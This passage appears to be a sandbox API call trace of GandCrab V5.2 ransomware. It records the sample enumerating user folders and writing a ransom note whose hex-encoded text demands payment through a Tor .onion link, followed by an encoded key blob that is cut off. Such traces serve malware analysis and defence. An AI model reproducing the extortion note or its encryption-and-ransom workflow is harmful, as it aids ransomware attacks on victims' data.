param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 111 [0079.126] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a09d2ca4deb61a.lock") returned 102 [0079.126] lstrlenW (lpString=".lock") returned 5 [0079.126] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.126] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.126] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.127] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.127] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0079.127] lstrcmpW (lpString1="Document Themes", lpString2=".") returned 1 [0079.127] lstrcmpW (lpString1="Document Themes", lpString2="..") returned 1 [0079.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="Document Themes" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0079.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\" [0079.127] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.127] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.127] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.127] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.127] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.128] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.128] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.128] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.128] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.128] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\\\TITWMVJL-DECRYPT.txt") returned 115 [0079.128] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0079.129] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\